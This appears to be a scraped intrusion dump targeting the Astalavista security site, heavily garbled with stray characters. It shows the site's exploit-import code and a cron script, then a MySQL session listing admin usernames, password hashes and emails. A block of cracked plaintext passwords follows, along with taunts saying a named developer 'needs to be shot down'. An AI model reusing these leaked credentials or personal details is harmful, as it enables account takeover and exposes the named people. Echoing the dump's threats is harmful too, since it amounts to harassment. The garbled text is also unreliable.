            $comExploits[$x]['userid']    = ‘12′;
% |9 F7 ~) H+ ~4 F. Q) k            $comExploits[$x]['startdate'] = ‘0000-00-00′;
* I+ }1 O6 W8 |7 R' ?+ ]. @            $comExploits[$x]['enddate']   = ‘0000-00-00′;- c, e& g" N3 f& i
            $comExploits[$x]['status']    = ‘1′;
7 J8 r6 x8 f  Z; l. A7 l            $comExploits[$x]['changelog'] = $date;
8 {7 C4 ]+ v6 b. A3 [  [# x  P2 n( H  G: c0 z$ d9 ~
        }
. x. @8 T& N6 [% Q" S4 T. u5 N[snip]
& W0 s- |6 H8 y    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>: i  _/ n: N+ d) p1 X
<rss version=”2.0″>
9 z  A5 ^' N; s% F/ c    <channel>
/ h+ w3 D, a& i4 X- G        <title>ASTALAVISTA.com - Exploits</title>
1 R0 l. ~6 S  Z3 h& S        <link>http://www.astalavista.com/exploits</link>
' ^2 W+ h9 i; d0 k1 i- M) ]        <description>All availably Exploits.</description>3 u9 k3 U- e0 ~) z9 i) h
        <language>en-us</language>
( a) r0 Y; F: N8 T5 u        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
4 M( c' ^/ q# X2 y% j8 V        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
" A9 ?$ k( b+ h1 Y  I        <generator>Astalavista.com</generator>: [' z/ L1 c; S2 e: Y
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘$ X1 U1 ~' g1 o- @' v. f4 e, \$ y1 v# a
    </channel>
) N2 n# I6 N2 @( x</rss>’;2 ]) w* m6 a2 P2 |, r, g  I
  g9 y& o5 c5 c9 G9 ^$ _
    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {7 I+ f. Z4 O9 Z/ \3 f/ A
        unlink (FULLPATH . ‘/feed/exploits.xml’);  B5 X8 O( K  G/ C) h
    }, F1 s9 [" _1 D# u, Q" {

1 l) {. \4 H( k+ y, Q8 W+ i5 _# H    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
* r- k/ h( H; i% d0 o8 H6 ^[snip]- f6 ^) d  m; _5 G$ r
# p2 X8 B! i" D9 i' d% Z
sh-3.2$ cat exploits.sh, S& n  j) _  z, c* m9 g* h
#!/bin/sh; |( Q4 r- b: \3 ]( ]# K9 j$ B5 y' }
: ~$ j1 `/ U. k) o# e& S2 o
###########################################################
2 g) j6 E; e/ b1 T" |#                                                         #
5 k- u! |( ^* I/ Y  p0 ~#   Title:        milw0rm exploits adder                  #
% ~) ?& x2 ~+ \% n#   Description:  Add all milw0rm exploits to the         #
. ]+ |" E$ a* E8 Z# i#                 Astalavista.com database                #' i6 F6 P. ]  W& ^, Q' [
#                                                         ## s$ Q9 Y2 s8 u7 W
#   Company:      Astalavista Group                       #
7 _! h# @5 u) W3 q. J#   Author:       Paulo M. Santos                         #
% i4 m$ m( f: F+ t#   E-Mail:       链接标记paulo.santos@astalavista.ch             #
8 x6 Z6 Q/ \1 w0 |& M6 Y- w#                                                         #
4 S* L7 D; [8 P, W###########################################################) j& F2 I7 p% W  o1 k: d+ r# F

6 x0 x; t4 Q, T( h) M! M3 h+ x( |# path5 a% [) M  }7 O! M3 c
this_path=/home/com/public_html/modifications/cronjobs
$ n- g3 L8 Z% c7 o2 p2 L5 V
  N9 W' |1 `0 A4 b' B( e) L# change directory9 D: }) s* B5 O9 ]8 P5 f, T
cd $this_path
8 ]/ `. `, u7 E& a2 vcd tmp/
1 F5 U8 n. L" E5 k0 \; ?8 p; |+ N2 z  w/ w* l
# delete files$ g% T! [" B: f0 {' P
rm -rf milw0rm.tar.* &
- C) B% _7 ]4 o; s% F& r& Prm -rf milw0rm/ &/ u9 O" |' @* D. M0 F, t
/ _# C4 a9 w: c
# wget milw0rm paket! Y5 Z$ O5 C& O- q1 L" o( Z5 v/ E* \
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
! a) t, Y# l9 s! Q1 v% q! ~" F7 D. g  v
# extract milw0rm paket9 f. @$ O# S4 e2 |! j' o
tar -xvf milw0rm.tar.bz2% A/ l; d: `% |. o. g2 e
7 b* F6 N: a2 Q/ O# _
# change owner0 a' b# \  s' u( F
chown -R com .$ g5 F+ `1 M$ D) i" ^+ X4 {
chgrp -R com .' z) }9 S1 P' s# @$ L7 y
) R* r9 [6 R. e. a
# execute php script6 }. B% _1 L1 `  I9 X# z
cd $this_path" s, z1 V% @" r$ o1 H/ H/ U
php -q exploits.php/ `+ t# \- G9 c. N

- R4 H, W7 k! C! A: W$ c" f# delete files2 Z6 b, p# e- h1 F1 M* z" l
rm -rf tmp/milw0rm.tar.*1 d* r6 s6 Q0 O( _
rm -rf tmp/milw0rm/+ B& \- C- D1 c

; @1 G8 Z# d' `" F4 N( rsh-3.2$ echo “Paulo M. Santos needs to be shot down.”! y/ ^" E3 L* ~/ l7 z4 E1 \
Paulo M. Santos needs to be shot down.. E) Z0 {6 C0 N7 _: {3 |

1 B* C1 G  k" x/ b% @( o6 T2 {5 `mysql -u contrexxuser2 -p0 r1 u7 I7 {+ x8 m- t9 q( P
Enter password:
% Q0 W6 J7 j. R$ S0 JWelcome to the MySQL monitor.  Commands end with ; or \g.8 E" q: E& j% B* y
Your MySQL connection id is 2616945 h& a+ E6 v& o5 S& N& o2 G8 P1 [  d
Server version: 5.0.45-community-log MySQL Community Edition (GPL)9 q" Z, i8 x3 S& p4 z) ~1 n

6 x! m# V! t& E. mType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.; ~. f  D4 x# m# j9 [  l

& X2 E" \1 T6 q  R6 U* b  Omysql> show databases;
3 _4 F. ]$ w) L6 W# z- _# D+——————–+
4 I- _2 x# `+ k& B3 l| Database           |
0 i: w" t7 L; @1 h! h# O+——————–+% s7 O& T, x! s( D; R3 d
| information_schema |. H; A% A' R/ Z& s1 Y9 l  ^- h
| com_contrexx2      |9 {; u  U" L3 H' D4 }) e
| com_contrexx2_live |3 y' a4 g& B! Q8 m
| test               |
4 G5 k1 m0 M# }3 d( E; {+——————–+
: a; T1 E/ w& Q: O+ u( ~4 rows in set (0.00 sec)) \# X, ~; n8 [3 S2 }' h! m
2 w. e3 Z  i/ \) P9 [
mysql> use com_contrexx2_live- f7 z3 e& ?" i& k! N. l$ t, S
Database changed( G3 F, M# a  e& S- i
mysql> show tables;9 {0 h- f  x) t, n' c8 ]
+————————————————–+
! p  `9 j! r6 ^1 u| Tables_in_com_contrexx2_live                     |, W7 C, j( w9 {- x. k3 M
+————————————————–+
6 o' `/ y3 V5 O! }) a| cc_banner_counter                                |
6 M, f& K6 F5 `| cc_search_counter                                |, r: S& \6 j2 _% e$ }9 }
| contrexx_access_group_dynamic_ids                |
4 S( q  T( E; _! x9 _| contrexx_access_group_static_ids                 |
/ g7 g0 l/ p1 H, s0 ?  _; @| contrexx_access_rel_user_group                   |
( P9 C0 Q( n4 I; B1 U3 ^| contrexx_access_settings                         |  m! z7 F% T' N. E# d/ P
| contrexx_access_user_attribute                   |
! F- ^4 k6 z) p9 ?| contrexx_access_user_attribute_name              |! _2 k9 _5 \8 a3 r
| contrexx_access_user_attribute_value             |( s1 C9 J2 [7 Q) o$ P
| contrexx_access_user_core_attribute              |6 Z* w4 W3 S6 d1 ?/ R1 h5 i
| contrexx_access_user_groups                      |
2 |, l) z* [1 @| contrexx_access_user_mail                        |' c0 S9 o+ {4 Y3 m9 U% d, f
| contrexx_access_user_profile                     |
6 v, J5 f! b) R% n3 Z7 G' l' m| contrexx_access_user_title                       |
: O: X$ o" A3 h7 Q  V/ {| contrexx_access_user_validity                    |
+ o$ d2 R5 T3 I4 h| contrexx_access_users                            |6 D2 z( v0 J5 I, x- j
| contrexx_backend_areas                           |$ e1 F: p5 y# `( B* [! O5 k
| contrexx_backups                                 |7 @$ j; o/ T, f# T& B
| contrexx_content                                 |
1 C" \# E+ P5 _5 m| contrexx_content_history                         |
& m9 J% l$ s% b| contrexx_content_logfile                         |1 \5 K% K3 I: [/ a  F3 C) a, H# q2 G
| contrexx_content_navigation                      |
4 L3 r& u  M- S. z| contrexx_content_navigation_history              |1 x- U& c5 X7 J9 C* \
| contrexx_ids                                     |
. L/ m4 D6 h' D: F8 A( k| contrexx_languages                               |
9 Z4 W. K6 A( ?4 a% C+ [| contrexx_lib_country                             |8 [; W8 ?# O" b" K
| contrexx_log                                     |
! ]* M& B" H) c# i& u5 w| contrexx_module_alias_source                     |3 H  x) t% l. ]3 V+ K3 v. ?' }5 U2 }0 y9 c
| contrexx_module_alias_target                     |
" w" f3 K& \: T% m| contrexx_module_block_blocks                     |5 {  t& E2 Z! y4 f' Y1 P
| contrexx_module_block_rel_lang                   |
/ ~. |. E6 M& k# {) V( t* Y| contrexx_module_block_rel_pages                  |, t1 q1 g& |& R2 c. J# X- x
| contrexx_module_block_settings                   |+ y) r1 s4 L1 {) ~( k
| contrexx_module_blog_categories                  |% u7 L; ^. y5 P. E! A" _4 U4 r
| contrexx_module_blog_comments                    |- B$ [  Y% _- Z* O' Y+ @
| contrexx_module_blog_message_to_category         |. a* t0 I& q- l% e0 Q& q2 A, r9 V
| contrexx_module_blog_messages                    |
# a" j+ x$ Q3 U( r1 |( o! `  D| contrexx_module_blog_messages_lang               |
' t) d) }1 d; H. n; E2 k| contrexx_module_blog_networks                    |
+ \3 M, q- n) D: {  Q0 |, C. h8 m# y| contrexx_module_blog_networks_lang               |
- R5 l( }9 w& k) F6 i: k| contrexx_module_blog_settings                    |9 r( ~6 l" C. s5 M) W* N; b. N! g
| contrexx_module_blog_votes                       |0 }6 Y/ b: Z# Q2 Z4 n4 j
| contrexx_module_calendar                         |& h% Y% T/ n8 p8 y. {
| contrexx_module_calendar_access                  |5 s4 x" \5 `) f# M. J* {& U
| contrexx_module_calendar_categories              |( Y5 ?3 B( ?  Y
| contrexx_module_calendar_form_data               |
9 L9 J7 J, l& H: v3 P| contrexx_module_calendar_form_fields             |9 g( `1 ~/ v% w3 P7 i
| contrexx_module_calendar_registrations           |
: d+ J8 d4 }! R; p: C! ?  M| contrexx_module_calendar_settings                |1 c" G# p" J) i' ^
| contrexx_module_calendar_style                   |! E, L5 D' X1 m
| contrexx_module_contact_form                     |
/ a3 l7 D, I6 a# l* [0 f/ k2 F7 G| contrexx_module_contact_form_data                |
- ~8 ~( P8 }6 L& U' Y| contrexx_module_contact_form_field               |0 [2 K" T- s2 y& q3 F/ m) o
| contrexx_module_contact_settings                 |% S! F0 C4 W3 q. z) O1 S
| contrexx_module_data_categories                  |8 g+ j+ F7 J2 {! X' f
| contrexx_module_data_message_to_category         |  ^% {) `' d6 t
| contrexx_module_data_messages                    |
( y/ Y6 Y, d( `  |  L| contrexx_module_data_messages_lang               |
+ r2 T0 L1 B/ p3 y| contrexx_module_data_placeholders                |( [, a) G& i% q7 M% i1 q3 l
| contrexx_module_data_settings                    |- V5 A3 ~! O8 y0 J0 ?5 b
| contrexx_module_directory_access                 |
0 d  i, h; S# N+ J2 n5 h! j' ~) q| contrexx_module_directory_categories             |
$ e$ s' m0 P8 G$ R* P| contrexx_module_directory_dir                    |
% _9 n/ ?  t7 f/ n/ s1 C: Y* o# ^| contrexx_module_directory_inputfields            |
/ q, y. [: N$ F! ?- X' j, y| contrexx_module_directory_levels                 |
( p* h8 g6 b, }- q| contrexx_module_directory_mail                   |( P6 o2 [5 I, N6 U, b. F
| contrexx_module_directory_rel_dir_cat            |! x; K' C. u1 N7 J* ]" k! Z
| contrexx_module_directory_rel_dir_level          |& j7 z! v4 S" S
| contrexx_module_directory_settings               |
1 W( Q1 Q$ @; o9 m6 M. A| contrexx_module_directory_settings_google        |4 c3 J2 [5 R& U. d. K$ [) S
| contrexx_module_directory_vote                   |
) a3 Q- B5 t. A9 e| contrexx_module_docsys                           |
, N5 H4 \; t) p6 s| contrexx_module_docsys_categories                |
3 B6 \% z3 m0 o5 S( A% M9 b| contrexx_module_egov_configuration               |6 l2 k) I0 ^, I- [
| contrexx_module_egov_orders                      |9 K) M8 X+ q- \  q& U
| contrexx_module_egov_product_calendar            |$ f  Y; N" Y' p# u: k8 j
| contrexx_module_egov_product_fields              |- u3 |' |8 {5 {( l8 ~+ M2 L
| contrexx_module_egov_products                    |: o9 p9 U9 Q3 O6 G; H. Q5 \
| contrexx_module_egov_settings                    |
3 k) G: l( y( s| contrexx_module_exploits                         |+ D1 C. O! S1 B# h# w6 ?+ g
| contrexx_module_exploits_categories              |
* Z& b, g# n' @" @; C' P" y| contrexx_module_feed_category                    |  c$ C4 H  P; w' u9 R0 W
| contrexx_module_feed_news                        |
$ B2 A: f9 l; \+ [| contrexx_module_feed_newsml_association          |  Y4 @2 m7 y- _4 h* P* V
| contrexx_module_feed_newsml_categories           |
. h# G& |( d, ^7 S6 s| contrexx_module_feed_newsml_documents            |3 i/ {) K9 f' x
| contrexx_module_feed_newsml_providers            |" L$ v" L# f% n
| contrexx_module_forum_access                     |, F! x8 N+ B" x6 k- A& J. _: @1 ?
| contrexx_module_forum_categories                 |
$ `9 ^( T. R% V/ U9 s0 c| contrexx_module_forum_categories_lang            |; K6 b. h0 H* ~2 ^4 x
| contrexx_module_forum_notification               |
$ q3 _, ~" [, \+ R  W| contrexx_module_forum_postings                   |% x$ Z: H$ {' N& g% n
| contrexx_module_forum_rating                     |, n# x- |, K6 H2 @* p; }- ?
| contrexx_module_forum_settings                   |' B% e% P/ K8 o1 b  ~
| contrexx_module_forum_statistics                 |4 `, X( z8 ]7 i( r! n
| contrexx_module_gallery_categories               |
. k! o, D6 D2 \/ q( \| contrexx_module_gallery_comments                 |
7 @7 [4 ]+ y2 T' P. a! s; u/ o| contrexx_module_gallery_language                 |, c5 a  l* _' u% f2 ^5 a
| contrexx_module_gallery_language_pics            |- f. l4 x/ q+ F  p
| contrexx_module_gallery_pictures                 |, c8 U. T* v# s+ q, X; y
| contrexx_module_gallery_settings                 |6 W/ `+ u% W+ \7 f# l1 _9 I8 p
| contrexx_module_gallery_votes                    |
- ^0 w  [$ c/ R! O* p0 l! Y| contrexx_module_guestbook                        |2 h% [0 O; O) ]! H& \
| contrexx_module_guestbook_settings               |. f, s0 S/ a1 `/ [/ x7 u
| contrexx_module_livecam                          |
5 }# ~0 t1 ~1 ^) ^- n! r| contrexx_module_livecam_settings                 |; |5 _" l( `- J8 X# e
| contrexx_module_market                           |) w" l- _7 R- F& I" R; J$ d
| contrexx_module_market_access                    |
6 j8 m# X- \6 k, I) T& e5 y/ r4 r& f9 O| contrexx_module_market_categories                |
. p$ m' E: y8 {- ^. {% v6 @& ?| contrexx_module_market_mail                      |
8 y& Z3 g+ g& w) O7 C" s0 c# g4 u. i| contrexx_module_market_paypal                    |( ~8 q6 }6 y$ }( q7 f+ |
| contrexx_module_market_settings                  |; J& b3 X) @" I4 L+ W2 m9 _* P
| contrexx_module_market_spez_fields               |" }. ~7 L7 U# J, D  b3 b
| contrexx_module_mediadir_access                  |  r$ V3 Z, D" I
| contrexx_module_mediadir_categories              |8 I& Q6 {+ r! K  s7 g
| contrexx_module_mediadir_comments                |$ O; a/ W0 C, L8 U6 j
| contrexx_module_mediadir_dir                     |
; o- e3 ^4 ]; n7 s$ p; n5 _| contrexx_module_mediadir_inputfields             |9 h2 c; W/ I# o) |' N$ {
| contrexx_module_mediadir_levels                  |
7 Q" `: u' f/ `6 j| contrexx_module_mediadir_mail                    |
6 i; A/ f3 ]9 }- ]3 d| contrexx_module_mediadir_rel_dir_cat             |
. S, C' n$ K/ A( y2 ~# X0 S) L| contrexx_module_mediadir_rel_dir_level           |
: q: S. {! O/ P6 l7 T| contrexx_module_mediadir_reports                 |. B! A/ x, {# k. L
| contrexx_module_mediadir_settings                |
6 |. W$ L/ l% ?! m| contrexx_module_mediadir_settings_google         |
$ w) q8 i, X2 E; a| contrexx_module_mediadir_vote                    |
) f5 n& Y7 X6 c4 E| contrexx_module_memberdir_directories            |
5 ?: l4 [! v1 F8 l0 `& L| contrexx_module_memberdir_name                   |
; V7 s; r- |5 W0 N/ Y5 @| contrexx_module_memberdir_settings               |
2 @& B" c, J9 }# o' S, s1 D| contrexx_module_memberdir_values                 |& ?8 q8 H, _, g
| contrexx_module_nettools_allowed_groups          |
( F$ B! q5 w8 j/ I* i) u) Z- W| contrexx_module_nettools_settings                |. B3 C8 }7 r$ X
| contrexx_module_news                             |1 d+ i" [4 @3 k
| contrexx_module_news_access                      |2 i5 d4 E* T! v: K: g2 ?2 s( Z6 d( d# b
| contrexx_module_news_categories                  |" i3 y* I8 f2 w' f3 K( C
| contrexx_module_news_settings                    |' j5 M/ V" a! k: e1 X4 @) ~
| contrexx_module_news_teaser_frame                |# W9 B9 M7 t& a2 U
| contrexx_module_news_teaser_frame_templates      |
5 i+ d# E6 \) M  {& W" j| contrexx_module_news_ticker                      |' ~7 I+ i6 \- O& n$ v) |/ c1 [
| contrexx_module_newsletter                       |
7 P; a8 p) c2 i0 C' d3 S$ }| contrexx_module_newsletter_attachment            |
( u# m2 C* {+ K& p| contrexx_module_newsletter_category              |2 _% q9 y% i9 A
| contrexx_module_newsletter_confirm_mail          |' i6 J$ y* ~2 w! y
| contrexx_module_newsletter_rel_cat_news          |
# P) [' D- p" F: G9 ?| contrexx_module_newsletter_rel_user_cat          |6 W0 ~8 a% l# H0 y3 i
| contrexx_module_newsletter_settings              |
; e2 o4 Y: V! _| contrexx_module_newsletter_template              |; r3 X0 L( P! k
| contrexx_module_newsletter_tmp_sending           |
0 k; V* Q9 ]/ ~) S  X| contrexx_module_newsletter_user                  |
0 R8 l& T+ p* @$ _7 N| contrexx_module_newsletter_user_title            |
# L4 e* `1 i$ || contrexx_module_onlinetools_defaultports         |
; K* s/ v0 f' z3 c8 Y) Z| contrexx_module_onlinetools_defaultports_back    |3 [. Z% u% b0 p
| contrexx_module_onlinetools_geolitecity_blocks   |
( J, P- n+ _$ m8 ^| contrexx_module_onlinetools_geolitecity_country  |
$ O' g$ {; `: f) L* [! v| contrexx_module_onlinetools_geolitecity_location |/ @  g4 L- r0 Q* D2 @: M0 P
| contrexx_module_podcast_category                 |8 i. `3 @+ Q2 b4 ?4 k; n; e
| contrexx_module_podcast_medium                   |1 Y/ r: \9 Q9 U& Y* W
| contrexx_module_podcast_rel_category_lang        |9 S' E+ w- N2 v" q1 J
| contrexx_module_podcast_rel_medium_category      |
! A2 S8 l" K( F) l( _| contrexx_module_podcast_settings                 |( j3 c, {* c% [9 ~* E$ b2 L+ a% f
| contrexx_module_podcast_template                 |! T# |6 s8 N! ]7 |0 V  M
| contrexx_module_proxydb                          |
  k; p  K6 _( \# m( A  F  y" a# k| contrexx_module_recommend                        |! r7 Y% `" [9 C2 T  a
| contrexx_module_repository                       |
9 T7 q  G: X# ^| contrexx_module_securitynews_cats                |
7 S' T5 `5 t1 W| contrexx_module_securitynews_feeds               |+ {/ B/ ?0 I' c% N1 {6 x
| contrexx_module_securitynews_news                |
( C6 ]( D& \3 @) w; ?| contrexx_module_shop_categories                  |
- f* ]6 P/ H- u; {| contrexx_module_shop_config                      |* [3 q% Z8 ^5 z/ R4 }0 Q8 ]
| contrexx_module_shop_countries                   |+ f8 V' I" e! _. q
| contrexx_module_shop_currencies                  |) M6 T9 w1 ^6 l
| contrexx_module_shop_customers                   |4 U4 ^8 @2 ~) ~7 O7 H0 V' l
| contrexx_module_shop_importimg                   |
& k& `# g& d/ D* A2 C| contrexx_module_shop_lsv                         |
( q7 }# c& y6 I  P: e' j| contrexx_module_shop_mail                        |
* f9 h+ _+ g  X# t1 l. m2 m| contrexx_module_shop_mail_content                |& l& f7 r* I1 A0 H* p0 ]2 w
| contrexx_module_shop_manufacturer                |- H6 G$ h4 i3 q
| contrexx_module_shop_order_items                 |
& I# |  V+ c* x& ]| contrexx_module_shop_order_items_attributes      |
% X, H2 R+ v' M| contrexx_module_shop_orders                      |
* U. M1 q0 R/ j* Q& i* {9 T| contrexx_module_shop_payment                     |
, x- x. r( m' `| contrexx_module_shop_payment_processors          |
# t7 v! i; C* o; e+ \1 k- @* l$ L  Z| contrexx_module_shop_pricelists                  |
8 W2 R3 D7 H! B$ `- {0 C- J| contrexx_module_shop_products                    |, c2 Z" l  v1 y3 m- A1 M2 v3 P
| contrexx_module_shop_products_attributes         |
7 D% {, `& j% E6 B' V& i/ `+ b| contrexx_module_shop_products_attributes_name    |
9 U3 x# B7 p+ b% ]/ @* g' _| contrexx_module_shop_products_attributes_value   |
" g! e) B* ~8 {- r( W| contrexx_module_shop_products_downloads          |; T& `  Z0 m' i9 j) ~- J- h, i( [
| contrexx_module_shop_rel_countries               |  p' j$ C" E9 I3 w" M
| contrexx_module_shop_rel_payment                 |
( q, O" k3 A% e# H| contrexx_module_shop_rel_shipment                |
' n0 C8 ~: q( {( j| contrexx_module_shop_shipment_cost               |: p, m- _: O9 a( W) r
| contrexx_module_shop_shipper                     |5 |' O  H0 ^- ?$ x9 D& m( ?2 P8 i2 X
| contrexx_module_shop_vat                         |. \4 A$ P( x1 L; |  G) ]
| contrexx_module_shop_zones                       |- k, P2 J3 ^5 l3 O
| contrexx_module_u2u_address_list                 |
3 n2 _; a* `0 Z; d! k/ D| contrexx_module_u2u_message_log                  |2 Y2 j3 c6 Q+ N6 _$ Q
| contrexx_module_u2u_sent_messages                |# x( x/ v4 ~/ T( c
| contrexx_module_u2u_settings                     |7 E2 R  k2 \$ i( y( m
| contrexx_module_u2u_user_log                     |! v- p" T2 G5 t9 T: l( g! t6 y+ f
| contrexx_modules                                 |
6 c1 e4 b- U% A" C3 h7 J6 E6 w" Q| contrexx_sessions                                |8 Z2 i1 ]3 Y4 i8 n) ?8 |$ G
| contrexx_settings                                |
- M1 f1 ~0 K. a& G| contrexx_settings_smtp                           |
. q7 l3 E' ~: ?# A4 d9 l| contrexx_skins                                   |
/ U. N  P1 I1 M6 K2 I6 [7 O4 `+ P| contrexx_stats_browser                           |
3 q% I* e2 S- G6 w- W$ y7 N| contrexx_stats_colourdepth                       |! ^# j0 |  |' z7 c2 n! A
| contrexx_stats_config                            |
7 s* T9 m2 |% Q8 O, `| contrexx_stats_country                           |
6 Y3 ^: ?" u$ K: {; L, A( N; K| contrexx_stats_hostname                          |' @6 b/ W/ N  u9 d8 @: B3 d
| contrexx_stats_javascript                        |! L* Z+ W5 _8 i# [
| contrexx_stats_operatingsystem                   |
9 x5 G# S) e: |- G| contrexx_stats_referer                           |( x  P+ h9 \, X" r) I! o& D8 P
| contrexx_stats_requests                          |
- {4 `. l7 y' n| contrexx_stats_requests_summary                  |7 r+ q2 e" d$ e/ E6 J
| contrexx_stats_screenresolution                  |
$ u8 `% ?2 O: v| contrexx_stats_search                            |
  p, D) y. o# D7 ?# ^| contrexx_stats_spiders                           |9 A% J5 v8 N6 @
| contrexx_stats_spiders_summary                   |
; g/ I% J) W1 ^6 t3 o| contrexx_stats_visitors                          |& b  J/ k. v& Z0 `# P0 P, X
| contrexx_stats_visitors_summary                  |, B  Y4 b1 v4 n9 M9 ~) x
| contrexx_voting_additionaldata                   |
* s& }, s: l4 e5 z| contrexx_voting_email                            |
" A0 k3 c4 i( r' P6 W( T- E. @| contrexx_voting_rel_email_system                 |' s6 ^! \4 x; S
| contrexx_voting_results                          |
- h, N4 f" e9 J& N. J" s| contrexx_voting_system                           |; {+ k+ W1 b, w
| foo                                              |
7 f( A4 L9 }5 b1 P/ c+ b+ S+————————————————–+
; B( y2 v% D$ b0 Z& M) N2 m/ p6 Z. }1 a227 rows in set (0.01 sec)
9 }) O: b+ C' [5 j4 `, L
5 h3 ^+ N5 M8 \& h6 g+ Smysql> select count(*) as skids from contrexx_access_users;! ]+ U8 n+ |  R4 R" D
+——-+
2 K7 S! g  J: t# ?| skids |
  {$ Y7 m' _1 x8 |+——-+
$ R! @/ h  {6 l, u, ]5 ]" U$ h| 53699 |5 H/ j( B. A! [7 B# g- m+ o
+——-+
1 a/ S- Y+ B2 P5 z7 r6 B: e1 row in set (0.00 sec)
6 o/ k0 i( y2 O( L6 S5 P/ j. G( u( e7 X- b3 p- {3 |
mysql> describe contrexx_access_users;! z# e0 N) O1 D4 `# E  P
+——————+——————————————+——+—–+————–+—————-+1 `; k/ [1 E/ @" x, h
| Field            | Type                                     | Null | Key | Default      | Extra          |
/ U& \9 a& H) Q1 O+——————+——————————————+——+—–+————–+—————-+
' e: ~8 m7 a2 |: A9 g  u| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |
' u: s6 y9 n2 O$ @1 g| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |6 M7 T" |9 u" E' K
| username         | varchar(40)                              | YES  | MUL | NULL         |                |
3 x: S$ W4 |( n2 j9 [1 H| password         | varchar(32)                              | YES  |     | NULL         |                |( `  h9 E5 t: f) {! J
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
8 X( {) Y- U& E1 E: B% _| expiration       | int(14) unsigned                         | NO   |     | 0            |                |& t5 h: ]0 i) ?3 ?
| validity         | int(10) unsigned                         | NO   |     | 0            |                |
  {1 ~/ C  r' r$ s$ P| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |, A* v3 j- j9 _0 V
| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |4 h" \, R* U/ I5 @/ U
| email            | varchar(255)                             | YES  |     | NULL         |                |
; Z( ]2 m0 x0 P: s) @! [3 a| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |
' u9 U0 X$ ?9 n6 I| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |+ `. D8 Q5 z) y! k7 H  s) D
| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |% I$ i. S7 M. R) H( {: u5 m. J
| active           | tinyint(1)                               | NO   |     | 0            |                |
: ?- n1 i) f$ ]) h) |+ A  v| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
4 Z7 l3 c: n! c7 f1 k1 E| restore_key      | varchar(32)                              | NO   |     |              |                |! k. M# n3 t; G
| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |
* H& z; U" `" t| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |
, ?% P, T( x8 T# A8 A; T8 S+——————+——————————————+——+—–+————–+—————-+! z+ A6 r! m$ G* }- c  m% k
18 rows in set (0.00 sec)
2 ?# x( l& ~  L7 D# `( `
3 W% W, U, X3 @3 A- m  ]mysql> select username,password,email from contrexx_access_users where is_admin = 1;" ~5 ^* _1 ?( ?+ N2 I; ~5 K# G
+————+———————————-+—————————–+
6 M/ _+ A1 `3 R. b6 v# G; X| username   | password                         | email                       |
) g! [8 J' z' J' Z1 a4 {+————+———————————-+—————————–+: H* S! D8 a/ ?
| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |: H" o. j6 k' G. F: b
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |
9 y0 g4 h9 O7 e; D6 H| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |' H% d7 N* v) Z* T
| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |
- C" y- _; Z5 r. L# ]" r1 v) w+————+———————————-+—————————–+! l% J# \2 v5 L
4 rows in set (0.04 sec)
( ~! i; q# B4 W; y# z# Q$ ]: {. W( A! N, x' T
mysql> exit;) l3 m7 O9 a- C' T1 |  D& j
Bye* D- ~5 l2 a! ^0 Y! S1 L$ N7 Q- }

7 C/ X$ Q5 s" y- N1 j! l1 q[~] There you go, your “team of security and IT professionals” is a joke.
! z! v- P+ J% J
9 f& n, }0 \& q( s9 H, D+——————————+
' k/ [% K& p/ u# o* x! ], g8 }system:f82BN3+_*
* i) H4 d' U- N0 u7 {. lBe1er0ph0r:belerophor4astacom
  p# ~5 j) p7 b5 h8 ^  t. A8 z  yprozac:asta4cms!, z" U; e) W" f) t# x/ Y6 K" Y
commander:mpbdaagf6m- t  n: N6 e* H( s+ [
sykadul:ak29eral$ l& a9 j+ h4 a' E  B1 t1 O% [4 h
+——————————+
" V) ]2 B" L& x' w2 v$ y
; ?7 N  |* X: P: W% ~[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
4 V* }0 ]& B9 S. ~…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
7 y8 F. T- Q/ M: [1 F( z9 ^6 Q( i% B7 y& y0 r7 P
[~] Lets move to astalavista.net now,
8 d6 j* |& Y4 x  Y" E: I' H" Z7 c  @( D
From <链接标记[url]https://www.astalavista.net/[/url]>:
( N" ^7 C8 y9 C  v1 d5 G6 P>> Everyone knows that the best defense is a good offense.
7 T* g3 x! ~# d# B: d  d+ r, r% E>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
! }" G( N! L2 u: d7 T>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.( A4 K( @/ l4 t5 N% u/ T- ^3 _
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
5 Q+ v6 k- \# w7 |7 S- N
7 m7 b) d% A  O  H>> Go ahead, try and hack our server . in a completely legal way!9 }6 q0 K) V) o8 Q- X+ M5 {3 ^
>> Learn by doing: We offer our members tricky tasks and challenges on an
" \2 v3 i# m+ i7 ?7 s+ Y- L1 X>> ongoing basis so you can test your knowledge and abilities. You can also3 j/ x+ O1 f. k1 q5 `
>> demonstrate what you.ve mastered by taking part in regular hacker contests- k6 b6 ]# O( ]. C; Q5 `: W
>> and war games+ F. G* ~/ {( y1 f9 Y0 i; _4 u6 z
; W7 f5 x- M) {7 ~9 z
